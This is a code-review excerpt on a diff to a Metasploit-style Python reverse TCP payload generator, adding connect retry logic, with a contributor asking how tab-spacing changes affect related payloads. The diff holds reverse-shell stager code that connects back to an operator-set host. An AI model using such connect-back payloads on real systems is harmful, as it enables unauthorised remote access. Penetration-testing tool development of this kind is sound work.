lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,14 +45,22 @@ def transport_config(opts={})
   def generate_reverse_tcp(opts={})
     # Set up the socket
     cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "import time\n"
+    cmd << "def connect():\n"
+    cmd << "\ttry:\n"
+    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     cmd << py_send_uuid if include_send_uuid
```

Comment:
Regarding the tab spacing for ```reverse_tcp_uuid``` , All the payloads are dependent on it. Changing the file `lib/msf/core/payload/python/reverse_tcp_uuid,rb` would result in the other payloads not working. What should I do in that case? Change all the payloads that are dependent namely `reverse_tcp` , `reverse_tcp_ssl` , `bind_tcp` ? @timwr